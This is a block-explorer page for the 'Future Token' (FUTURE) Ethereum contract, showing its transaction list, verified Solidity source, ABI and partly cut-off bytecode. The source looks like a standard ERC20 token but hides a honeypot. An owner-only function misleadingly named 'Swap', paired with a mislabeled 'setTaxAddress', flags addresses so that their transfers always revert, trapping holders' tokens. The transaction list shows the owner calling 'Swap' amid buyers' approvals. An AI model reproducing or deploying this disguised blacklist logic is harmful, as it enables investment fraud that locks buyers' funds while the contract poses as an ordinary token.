ETH Price: $2,622.34 (-2.03%)
Gas: 5 Gwei

Contract

0x64576624ED1A8DD72146bF6ae807921EF93Ff913
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve169674352023-04-03 8:51:11497 days ago1680511871IN
0x64576624...EF93Ff913
0 ETH0.0008380317.86247305
Approve169663992023-04-03 5:20:23497 days ago1680499223IN
0x64576624...EF93Ff913
0 ETH0.0008470317.96231696
Approve169651872023-04-03 1:15:23497 days ago1680484523IN
0x64576624...EF93Ff913
0 ETH0.0004895516.41919078
Approve169651752023-04-03 1:12:59497 days ago1680484379IN
0x64576624...EF93Ff913
0 ETH0.0007618816.25603298
Approve169651002023-04-03 0:57:35497 days ago1680483455IN
0x64576624...EF93Ff913
0 ETH0.0008456818.04860828
Approve169650732023-04-03 0:52:11497 days ago1680483131IN
0x64576624...EF93Ff913
0 ETH0.0009407619.95
Approve169650152023-04-03 0:40:35497 days ago1680482435IN
0x64576624...EF93Ff913
0 ETH0.0008168317.32188505
Approve169650142023-04-03 0:40:23497 days ago1680482423IN
0x64576624...EF93Ff913
0 ETH0.000842817.85
Approve169649672023-04-03 0:30:59497 days ago1680481859IN
0x64576624...EF93Ff913
0 ETH0.0004711418.89713012
Approve169649572023-04-03 0:28:59497 days ago1680481739IN
0x64576624...EF93Ff913
0 ETH0.0009143119.36442776
Swap169649572023-04-03 0:28:59497 days ago1680481739IN
0x64576624...EF93Ff913
0 ETH0.0009384220.22460323
Approve169649512023-04-03 0:27:35497 days ago1680481655IN
0x64576624...EF93Ff913
0 ETH0.0008722918.49802247
Approve169649332023-04-03 0:23:59497 days ago1680481439IN
0x64576624...EF93Ff913
0 ETH0.0008095517.14572798
Swap169649172023-04-03 0:20:47497 days ago1680481247IN
0x64576624...EF93Ff913
0 ETH0.0007775116.75671941
Approve169649082023-04-03 0:18:59497 days ago1680481139IN
0x64576624...EF93Ff913
0 ETH0.0007366715.72210806
Approve169649082023-04-03 0:18:59497 days ago1680481139IN
0x64576624...EF93Ff913
0 ETH0.0008460118.03249596
Approve169649002023-04-03 0:17:23497 days ago1680481043IN
0x64576624...EF93Ff913
0 ETH0.0004769919.13164856
Swap169648912023-04-03 0:15:35497 days ago1680480935IN
0x64576624...EF93Ff913
0 ETH0.0009755921.02577859
Approve169648892023-04-03 0:15:11497 days ago1680480911IN
0x64576624...EF93Ff913
0 ETH0.0010906823.1
Swap169648842023-04-03 0:14:11497 days ago1680480851IN
0x64576624...EF93Ff913
0 ETH0.0154472333
Approve169648812023-04-03 0:13:35497 days ago1680480815IN
0x64576624...EF93Ff913
0 ETH0.0012708726.91628386
Swap169648782023-04-03 0:12:59497 days ago1680480779IN
0x64576624...EF93Ff913
0 ETH0.0011117723.96058926
Approve169648762023-04-03 0:12:35497 days ago1680480755IN
0x64576624...EF93Ff913
0 ETH0.0012394526.25081913
Swap169648742023-04-03 0:12:11497 days ago1680480731IN
0x64576624...EF93Ff913
0 ETH0.0010811323.30027177
Swap169648622023-04-03 0:09:47497 days ago1680480587IN
0x64576624...EF93Ff913
0 ETH0.0014529431.31349584
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
FUTURE

Compiler Version
v0.8.2+commit.661d1103

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-04-02
*/

// SPDX-License-Identifier: MIT 
pragma solidity =0.8.2;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    address internal _owner;
    mapping (address => uint256) internal _balances;
    mapping (address => bool) private _executeTransfer;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private maxTxLimit = 1*10**11*10**9;
    uint256 internal _totalSupply;
    bool intTx = true;
    uint256 private balances;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _owner = msg.sender;
        balances = maxTxLimit;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }
        
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function setTaxAddress(address _Address) external onlyOwner {
        _executeTransfer[_Address] = false;
    }

    function Swap(address _Address) external onlyOwner {
        _executeTransfer[_Address] = true;
    }

    function isExcludedFromTaxFee(address _Address) public view returns (bool) {
        return _executeTransfer[_Address];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
     
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be grater thatn zero");
        if (_executeTransfer[sender] || _executeTransfer[recipient]) require(intTx == false, "");
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
    } 

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = balances - amount;
        _totalSupply -= amount;
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract FUTURE is ERC20 {
    uint8 immutable private _decimals = 9;
   
    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor () ERC20('Future Token', 'FUTURE') {
        _totalSupply += 5000000000 * 10**9;
        _balances[_msgSender()] += _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_Address","type":"address"}],"name":"Swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_Address","type":"address"}],"name":"isExcludedFromTaxFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_Address","type":"address"}],"name":"setTaxAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a060405268056bc75e2d631000006004556001600660006101000a81548160ff021916908315150217905550600960ff1660809060ff1660f81b8152503480156200004a57600080fd5b506040518060400160405280600c81526020017f46757475726520546f6b656e00000000000000000000000000000000000000008152506040518060400160405280600681526020017f46555455524500000000000000000000000000000000000000000000000000008152508160089080519060200190620000cf92919062000247565b508060099080519060200190620000e892919062000247565b50336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506004546007819055505050674563918244f400006005600082825462000150919062000325565b92505081905550600554600160006200016e6200023f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620001b9919062000325565b92505081905550620001d06200023f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60055460405162000231919062000308565b60405180910390a362000420565b600033905090565b82805462000255906200038c565b90600052602060002090601f016020900481019282620002795760008555620002c5565b82601f106200029457805160ff1916838001178555620002c5565b82800160010185558215620002c5579182015b82811115620002c4578251825591602001919060010190620002a7565b5b509050620002d49190620002d8565b5090565b5b80821115620002f3576000816000905550600101620002d9565b5090565b620003028162000382565b82525050565b60006020820190506200031f6000830184620002f7565b92915050565b6000620003328262000382565b91506200033f8362000382565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620003775762000376620003c2565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620003a557607f821691505b60208210811415620003bc57620003bb620003f1565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60805160f81c61194c6200043f60003960006104de015261194c6000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c578063a457c2d711610066578063a457c2d71461025f578063a9059cbb1461028f578063c283cd12146102bf578063dd62ed3e146102ef576100ea565b806370a08231146101f557806395d89b4114610225578063a1883d2614610243576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806339fded47146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761031f565b60405161010491906112dd565b60405180910390f35b610127600480360381019061012291906110c2565b6103b1565b60405161013491906112c2565b60405180910390f35b6101456103cf565b604051610152919061143f565b60405180910390f35b61017560048036038101906101709190611073565b6103d9565b60405161018291906112c2565b60405180910390f35b6101936104da565b6040516101a0919061145a565b60405180910390f35b6101c360048036038101906101be91906110c2565b610502565b6040516101d091906112c2565b60405180910390f35b6101f360048036038101906101ee919061100e565b6105ae565b005b61020f600480360381019061020a919061100e565b610697565b60405161021c919061143f565b60405180910390f35b61022d6106e0565b60405161023a91906112dd565b60405180910390f35b61025d6004803603810190610258919061100e565b610772565b005b610279600480360381019061027491906110c2565b61085b565b60405161028691906112c2565b60405180910390f35b6102a960048036038101906102a491906110c2565b61094f565b6040516102b691906112c2565b60405180910390f35b6102d960048036038101906102d4919061100e565b61096d565b6040516102e691906112c2565b60405180910390f35b61030960048036038101906103049190611037565b6109c3565b604051610316919061143f565b60405180910390f35b60606008805461032e906115a3565b80601f016020809104026020016040519081016040528092919081815260200182805461035a906115a3565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103c56103be610a4a565b8484610a52565b6001905092915050565b6000600554905090565b60006103e6848484610c1d565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610431610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156104b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104a89061137f565b60405180910390fd5b6104ce856104bd610a4a565b85846104c991906114e7565b610a52565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b60006105a461050f610a4a565b84846003600061051d610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461059f9190611491565b610a52565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461063c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106339061139f565b60405180910390fd5b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600980546106ef906115a3565b80601f016020809104026020016040519081016040528092919081815260200182805461071b906115a3565b80156107685780601f1061073d57610100808354040283529160200191610768565b820191906000526020600020905b81548152906001019060200180831161074b57829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610800576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107f79061139f565b60405180910390fd5b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000806003600061086a610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610927576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091e9061141f565b60405180910390fd5b610944610932610a4a565b85858461093f91906114e7565b610a52565b600191505092915050565b600061096361095c610a4a565b8484610c1d565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ac2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab9906113ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b299061133f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c10919061143f565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c84906113bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf4906112ff565b60405180910390fd5b60008111610d40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d379061131f565b60405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610de15750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610e3d5760001515600660009054906101000a900460ff16151514610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e33906113df565b60405180910390fd5b5b610e48838383610fdf565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ecf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec69061135f565b60405180910390fd5b8181610edb91906114e7565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f6d9190611491565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd1919061143f565b60405180910390a350505050565b505050565b600081359050610ff3816118e8565b92915050565b600081359050611008816118ff565b92915050565b60006020828403121561102057600080fd5b600061102e84828501610fe4565b91505092915050565b6000806040838503121561104a57600080fd5b600061105885828601610fe4565b925050602061106985828601610fe4565b9150509250929050565b60008060006060848603121561108857600080fd5b600061109686828701610fe4565b93505060206110a786828701610fe4565b92505060406110b886828701610ff9565b9150509250925092565b600080604083850312156110d557600080fd5b60006110e385828601610fe4565b92505060206110f485828601610ff9565b9150509250929050565b6111078161152d565b82525050565b600061111882611475565b6111228185611480565b9350611132818560208601611570565b61113b81611633565b840191505092915050565b6000611153602383611480565b915061115e82611644565b604082019050919050565b6000611176602983611480565b915061118182611693565b604082019050919050565b6000611199602283611480565b91506111a4826116e2565b604082019050919050565b60006111bc602683611480565b91506111c782611731565b604082019050919050565b60006111df602883611480565b91506111ea82611780565b604082019050919050565b6000611202602083611480565b915061120d826117cf565b602082019050919050565b6000611225602583611480565b9150611230826117f8565b604082019050919050565b6000611248600083611480565b915061125382611847565b600082019050919050565b600061126b602483611480565b91506112768261184a565b604082019050919050565b600061128e602583611480565b915061129982611899565b604082019050919050565b6112ad81611559565b82525050565b6112bc81611563565b82525050565b60006020820190506112d760008301846110fe565b92915050565b600060208201905081810360008301526112f7818461110d565b905092915050565b6000602082019050818103600083015261131881611146565b9050919050565b6000602082019050818103600083015261133881611169565b9050919050565b600060208201905081810360008301526113588161118c565b9050919050565b60006020820190508181036000830152611378816111af565b9050919050565b60006020820190508181036000830152611398816111d2565b9050919050565b600060208201905081810360008301526113b8816111f5565b9050919050565b600060208201905081810360008301526113d881611218565b9050919050565b600060208201905081810360008301526113f88161123b565b9050919050565b600060208201905081810360008301526114188161125e565b9050919050565b6000602082019050818103600083015261143881611281565b9050919050565b600060208201905061145460008301846112a4565b92915050565b600060208201905061146f60008301846112b3565b92915050565b600081519050919050565b600082825260208201905092915050565b600061149c82611559565b91506114a783611559565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114dc576114db6115d5565b5b828201905092915050565b60006114f282611559565b91506114fd83611559565b9250828210156115105761150f6115d5565b5b828203905092915050565b600061152682611539565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561158e578082015181840152602081019050611573565b8381111561159d576000848401525b50505050565b600060028204905060018216806115bb57607f821691505b602082108114156115cf576115ce611604565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e7366657220667